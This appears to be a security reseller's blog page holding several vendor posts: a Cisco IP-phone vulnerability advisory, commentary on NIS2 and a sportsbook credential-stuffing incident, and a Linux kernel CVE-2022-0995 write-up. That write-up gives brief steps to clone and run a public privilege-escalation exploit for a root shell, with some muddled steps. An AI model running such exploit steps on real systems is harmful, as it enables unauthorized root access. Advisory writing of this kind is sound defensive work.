Skip to content

Finding Cisco 7800 and 8800 series IP phone assets on your network

Cisco recently published vulnerability details which affect their 7800 and 8800 series of IP (VoIP) phones. These phones are sold across many different model numbers and can be found in businesses and organizations of varying sizes. Originally reported to Cisco by Qian Chen of the Codesafe Team of Legendsec at QI-ANXIN Group, this vulnerability does not require authentication for successful exploitation and can provide attackers remote code execution and/or denial-of-service (DoS) capabilities.

What is the impact?

Cisco assigned a CVSS “high” rating to this vulnerability (tracked as CVE-2022-20968) and has acknowledged that proof-of-concept exploitation code exists. Firmware for all 7800 and 8800 series IP phones (with the lone exception of Cisco Wireless IP Phone 8821) contains this vulnerability, which resides in the input validation logic of received Cisco Discovery Protocol packets. Attackers who have presence in the same VLAN or network segment as vulnerable devices can send specially-crafted Cisco Discovery Protocol packets to trigger a stack overflow, resulting in a denial-of-service condition or potential code execution.

Are updates available?

All firmware versions (14.2 and prior) for these 7800 and 8800 series IP phones contain this vulnerability (CVE-2022-20968), and Cisco is not planning on releasing patched firmware –which is currently expected to be version 14.2(1)– until next month (January 2023).

In the meantime, Cisco does offer the following mitigation for vulnerable IP phones:

Administrators may disable Cisco Discovery Protocol on affected IP Phone 7800 and 8800 Series devices. Devices will then use LLDP for discovery of configuration data such as voice VLAN, power negotiation, and so on. This is not a trivial change and will require diligence on behalf of the enterprise to evaluate any potential impact to devices as well as the best approach to deploy this change in their enterprise.

You can find the full details around this mitigation in the associated Cisco Security Advisory (see “Workarounds” section).

How do I find potentially vulnerable Cisco 7800 and 8800 series IP phone assets with runZero?

From the Asset Inventory, use the following pre-built query to locate Cisco 7800 and 8800 series IP phone assets which may need remediation:

type:"IP Phone" and (hw:"Cisco CP-78" or hw:"Cisco CP-88")

As always, any prebuilt queries are available from our Queries Library. Check out the library for other useful inventory queries.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About runZero
runZero, a network discovery and asset inventory solution, was founded in 2018 by HD Moore, the creator of Metasploit. HD envisioned a modern active discovery solution that could find and identify everything on a network–without credentials. As a security researcher and penetration tester, he often employed benign ways to get information leaks and piece them together to build device profiles. Eventually, this work led him to leverage applied research and the discovery techniques developed for security and penetration testing to create runZero.

A Floor, not a Ceiling: ESET welcomes the approval of NIS2

ESET welcomes the decision of EU legislators to adopt the second Network and Information Security Directive (NIS2) aimed at strengthening cyber resilience across the Union. The new legislation comes as a response to the growing dependency of critical sectors on digitalization and their higher exposure to cyber threats.

The directive now approved replaces the NIS directive introduced in 2016 as the first-ever EU-wide legislation on cybersecurity. NIS2 introduces a broader scope of action, impacting more entities in “high criticality” sectors, both the public and private sectors, such as energy, transport, banking, water and waste water, among other critical infrastructure. Whilst new obligations are brought in for those in other “critical” sectors such as manufacturing, food, chemicals, waste management, postal and courier services.

Enterprises classed as “High Criticality” will be required to take both technical and operational measures to comply with NIS2, including incident response, supply chain security, encryption and vulnerability disclosure, adequate risk analysis, testing and auditing of cybersecurity strategies, and crisis management planning in view to ensure business continuity. In case of a cyber incident, these entities will also be required to submit an initial notification within 24 hours and more detailed information within 72 hours. NIS2 also introduces fines for failure to comply, including suspension of certification and personal liability to managerial positions, in line with national laws.

Finally, the directive establishes the European Cyber Crises Liaison Organization Network, EU-CyCLONe, to enable cooperation between national agencies and authorities in charge of cybersecurity, and each Member State will also be required to clearly identify a single point of contact to report cyber incidents.

Are SMEs also obliged to comply?
NIS2 establishes “the application of the size-cap rule, whereby all medium and large enterprises, as defined by Commission Recommendation 2003/361/EC, that operate within the sectors or provide the type of services covered by this Directive, fall within its scope”. While it excludes Small and Micro enterprises from having to comply with the new rules, some exceptions apply for example for SMEs in the sectors of electronic communications networks or of publicly available electronic communications services, trust service providers or top-level domain name (TLD) name registries.

Small and medium-sized enterprises are increasingly becoming the target of supply chain attacks due to limited security resources. Such supply chain attacks can have a cascading effect on entities to which they provide supplies. Member States should, through their national cybersecurity strategies, help small and medium-sized enterprises to address the challenges faced in their supply chains. Member States should have a point of contact for small and medium-sized enterprises at national or regional level, which either provides guidance and assistance to small and medium-sized enterprises or directs them to the appropriate bodies for guidance and assistance with regard to cybersecurity related issues.

In March last year, the European DIGITAL SME Alliance, EU’s largest SME network in the field of ICT, published its position paper to the consultation on the proposal for NIS2, welcoming the new directive, but also alerting for the indirect impact of NIS2 on SMEs.

In conversation with ESET, James Philpot, Project Manager at DIGITAL SME, notes that the first step SMEs should be taking to “understand specific needs to boost their cybersecurity practices” is looking at their “national cybersecurity center and ENISA’s guides and recommendations”. However, “it might be easier or harder” to get the right information as “different Member States provide different resources”. Nonetheless, NIS2 “mandates that States should provide support and resources” mainly when it comes to getting a detailed understanding of the scope of this legislation “and whether their customers will be subject to it”, which will “help plan ahead”.

Turning challenges into opportunities.
“Downstream suppliers are likely to be the most disrupted”, and it can be challenging for some companies to have the needed technical capabilities but mainly to understand “reporting requirements and how NIS2 interplays with other legislation”, explained Philpot.

“But in a more general sense, we have to be positive about it”, and “efforts to improve the level of cybersecurity in European businesses are generally welcomed”. The only caveat, alerts Philpot, is the level of “implementation and support, and how that is managed, that will ultimately be the difference between the legislation helping SMEs and the legislation being regulatory overburden”.

Moreover, ESET and DIGITAL SME are convinced that this new framework might be an opportunity. “Yes, it can be an opportunity, there are technical solutions available in Europe to provide the level of cybersecurity required”, but companies need to avoid “looking for the biggest name or cheapest offer, which tends to come from outside of Europe”. This is why it is so important to “link support and resources” to “leverage this legislation and to strengthen European innovation”.

SMEs can also reach out to their local CSIRTS to mitigate some of the deficiencies of other national bodies, or take advantage of resources such as the DIGITAL SME/SBS guide, the DIGITAL SME Guide on Information Security Controls or cybersecurity certificates.

Moving towards safer enterprises.
ESET’s SMB Digital Security Sentiment Report, published just last month, discovered that while 83% of SMEs believe that cyber warfare is a very real threat and 71% had moderate to high confidence in their ability to investigate the root cause of cyberattacks, 43% consider the lack of awareness of employees as the leading cause for concern, while the actual uptake of EDR (end-point detection and response) solutions, which specifically assist in this area, was only at 32%.

As Philpot also notes in the conversation with ESET, “the impacts of cyber incidents are well known” to SMEs: data leaks, considerable financial impact and loss of customer confidence. So “in a more general sense, we have to be positive” about NIS2; at the very least, this directive will play an important awareness role, even for those companies that “aren’t required to comply, they may develop greater awareness”

The NIS2 will become applicable after the EU Member States transpose the Directive into their national law: by September 2024. Nevertheless, organizations might want to be ready sooner than later, not only to be timely on the implementation process, but also to test different good practices on incident handling, control policies and reporting mythologies. Above all, NIS2 defines a minimum common level of cybersecurity in Europe, one that should be seen as the floor under our feet, not as a ceiling.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About ESET
For 30 years, ESET® has been developing industry-leading IT security software and services for businesses and consumers worldwide. With solutions ranging from endpoint security to encryption and two-factor authentication, ESET’s high-performing, easy-to-use products give individuals and businesses the peace of mind to enjoy the full potential of their technology. ESET unobtrusively protects and monitors 24/7, updating defenses in real time to keep users safe and businesses running without interruption. Evolving threats require an evolving IT security company. Backed by R&D facilities worldwide, ESET became the first IT security company to earn 100 Virus Bulletin VB100 awards, identifying every single “in-the-wild” malware without interruption since 2003.

Online Casino Heist Shreds Confidence in Cybersecurity

Nature abhors a vacuum, and so do cybercriminals. Whenever a new corner of the digital economy emerges, hackers are swift to infiltrate and exploit it to the fullest extent possible. It’s a law of digital life by now. To see it validated once again, just look at what happened to DraftKings last week.

Users of the popular sport-betting app found themselves locked out of their accounts. Upon getting back in, some found that funds had been drained away, totaling $300,000 across all those affected.

This is hardly the biggest hack of late, nor is it the first time that an online sportsbook has been a target. It won’t be the last time, either. In fact, FanDuel, a competing sportsbook, has also reported increased malicious activity though no confirmed attacks. More likely this is an early instance of what will be a long, sustained wave of attacks on online gambling.

Why? For the simple reason that huge (and fast-growing) sums of money slosh around in online gambling accounts – sports books recorded $3 billion in revenue through the first half of 2022, shattering previous records. Highly lucrative, these accounts are also highly vulnerable because people have yet to appreciate the risks of these accounts and take even basic cybersecurity measures. Hackers saw a vacuum waiting to be filled, and it just happened to have a pile of gold sitting inside.

Attacks like the one on DraftKings should surprise no one. Regardless, that particular attack has lessons – for both gamblers and casinos – that could keep this problem from getting much worse.

Online Gambling – Doubling Down on Risk

Criminals go where the money is located. So it’s predictable that casinos, race tracks, and betting parlors have been frequent targets for criminal activity since their inception. Not only do these locations have piles of cash on hand, but it also moves around faster and more freely than it does somewhere like a bank. Also unlike financial institutions, security standards and regulatory requirements are less strict around gambling (especially at underground operations). For all these reasons, anywhere that gamblers congregate looks like a prime candidate for theft.

Online operations are no different; they are a low-risk, high-value target. Except in the case of companies like DraftKings, both those factors are taken to the extreme. Gambling in online spaces lets more people and money collect in one place than any building could ever accommodate. The potential payout of a successful attack is much larger. At the same time, the number of ways to steal online gambling proceeds far exceeds the ways to steal real money. One takes an off-the-shelf cyber attack – the other takes Ocean’s Eleven.

The DraftKings attack is unfortunately a perfect example of the unique cyber risks accompanying online gambling. The perpetrators managed to access people’s accounts using credential stuffing: they used known user names and password combinations – either purchased from the dark web or stolen during a separate attack – to see which ones granted access to DraftKings accounts. Once inside, it was simple to change the bank account information and drain the funds. This means some online gamblers are using the same username/password they use for Amazon or Netflix. Most gamblers are protective of their stakes. That same caution has migrated online yet, and neither have the robust cybersecurity standards we are used to with other kinds of online transactions – DraftKings does not require MFA, for example, which would have prevented this attack.

Some of these problems will be resolved as online gambling matures. But during that same period, cyber attacks will mature as well, and hackers won’t quickly retreat from such a lucrative target. As the money flowing into sites like DraftKings keeps skyrocketing, expect the scale and audacity of attacks to do the same.

Seeing the Bigger Problem

The problems facing online gambling are similar to those facing another industry: crypto. Attacks on crypto exchanges and wallets have repeatedly made headlines, led to billions in losses, and shown all indications of getting worse. The reason why, like online gambling, is lots of money collected in one place – or flying around anonymously – without strong (or even basic) security protections in place.

This strikes me as indicative of a larger problem affecting most aspects of our expanding digital lives, which is a failure to realistically anticipate risks and plan for cyber attacks. With the DraftKings hack and so many of the crypto examples, the level of caution and preparation – on the part of both users and developers – was severely out of step with the risk. To put it differently, we wandered obliviously into the jaws of a tiger. Worst of all, we already knew the tiger was there.

I don’t blame users for recycling their passwords or even blame DraftKings for making MFA optional. The real culprit is a culture that’s still lax on cybersecurity and content to fix problems after the fact. Anyone could have predicted that online gambling accounts or wallets full of digital currency would attract an immediate and aggressive onslaught from hackers. But could anyone explain why security around those targets started off (and still remains) so over-matched?

The answer is complicated, no doubt. And I don’t claim to have the whole thing. What I do know is that if hackers are waltzing into obviously sensitive accounts and making off with huge sums, cybersecurity has some serious ground to make up.

#cybersecurity #DraftKings #gambling #credentialstuffing #crypto

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About VRX
VRX is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

Critical Factors for the Success of Cybersecurity Projects

Not investing in cybersecurity is a mistake that can cause incalculable loss to organizations. After the Covid-19 pandemic, digital vulnerability has reached alarming numbers with the implementation of the home office work model, bringing the need to develop effective cybersecurity projects to serve the most diverse industries.

The process of developing cybersecurity projects is challenging. With that in mind, our article brings 4 critical factors for the success of this type of action.

Senior Management Support

In a company, all projects of great relevance must go through the approval or refusal of senior management. If the decision is for the implementation of the project, the engagement and cooperation of leaders are essential for the action to be successful. Regarding the adoption of cybersecurity measures, it is no different.

Gaining the support of senior management is one of the critical factors for the successful implementation of a cybersecurity plan. If a company’s management knows and trusts the project’s ability to meet the demands of its business, it will be ready to adopt it.

User Awareness

Presenting the purpose and importance of cybersecurity projects is an essential part of informing and raising users’ awareness. In order to engage employees and show how their actions can affect everyone within a digital environment, training should be applied with practical examples of the dangers posed by cyber risks and showing how to prevent them using the tools and solutions provided by the project.

Moreover, teams should be aware of Incident Response, Disaster Recovery, and Business Continuity Plans. In this way, it will be possible to create a greater sense of responsibility and engagement in all users, and not only in those specifically assigned to the company’s IT area.

Monitoring and Control of Scope, Term, and Budget

The scope of a project contains the mapping of all the work necessary for its progress and completion. It contains the defined goals and each of the stages for implementing the project. Monitoring and controlling the scope is to always remain alert for any changes that may arise in the development of the project, managing which are necessary or dispensable; which are within the budget and schedule available; and which have had approval and agreement from all people involved.

It is still necessary to track each of these changes to obtain an optimization of time and assignment of staff in the establishment of tasks so that the modifications do not negatively affect the project journey.
It is also important to create a project scope statement and make sure all stakeholders understand it. When dealing with external clients, it is also necessary to have a policy of changes and restrictions.

Conclusion

In this article, you found out what are the critical factors to succeed in developing cybersecurity projects. Did you like our content? Then share it with someone also interested in the topic.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Segura®
Segura® strive to ensure the sovereignty of companies over actions and privileged information. To this end, we work against data theft through traceability of administrator actions on networks, servers, databases and a multitude of devices. In addition, we pursue compliance with auditing requirements and the most demanding standards, including PCI DSS, Sarbanes-Oxley, ISO 27001 and HIPAA.

Out-of-Bound (OOB) Write Memory Flow CVE–2022-0995

Introduction:

An out-of-bounds (OOB) memory write flaw was found in the Linux kernel’s watch_queue event notification subsystem. This flaw can overwrite parts of the kernel state, potentially allowing a local user to gain privileged access or cause a denial of service on the system. Vulnerability Release Time:
  • 2022-03-14 11:43 UTC
Vulnerability Impact & Type
  • Successful exploitation of this vulnerability could lead to disclosure of sensitive information, addition or modification of data, or Denial of Service (DoS).
  • Privilege Escalation
Affected Products:
  • This vulnerability exist in all Linux versions up to 5.17 RC1 till RC7
Fixed Versions
  • Kernel 5.17 RC8 and above
Severity: The software writes data past the end, or before the beginning, of the intended buffer. This typically occurs when the pointer or its index is incremented or decremented to a position beyond the bounds of the buffer or when pointer arithmetic results in a position outside of the valid memory location to name a few. This may result in corruption of sensitive information, a crash, or code execution among other things. CVSS v3.1:
  • Base Score: 7.2 (High)
  • CWD ID: 787
  • Vulnerability type: Low
  • Gained Access: None
  • Authentication: None
  • Confidentiality Impact: Complete
  • Integrity Impact: Complete
  • Availability Impact: Complete
  • Access Complexity: Low
Mitigation: Mitigation for this issue is either not available or the currently available options don’t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability Technical Analysis / Exploits: 1. Login to my linux machine as a normal user and shown the linux version I’m using. 2. Now let’s download exploit data in our local machine. Use below command to successfully download exploit data from github repository: 
git clone https://github.com/Bonfee/CVE-2022-0995.git
3. After cloning the repository, change current directory to downloaded repository directory using below command: cd CVE-2022-0995 After the script completes its execution, you will successfully get the root user shell. ./exploit 4. After the script completes its execution, you will successfully get the root user shell. 5. Now, use below command to get bash shell of root user: /bin/bash/ Now you are at root user bash shell and you can do everything as a root user. Reference: 
● https://github.com/Bonfee/CVE-2022-0995
● https://nvd.nist.gov/vuln/detail/CVE-2022-0995
● https://access.redhat.com/security/cve/cve-2022-0995
#CVE–2022-0995 #Linux #kernel #Out-of-Bound(OOB)

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About VRX
VRX is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

×

Hello!

Click one of our contacts below to chat on WhatsApp

Social Chat is free, download and try it now here!

×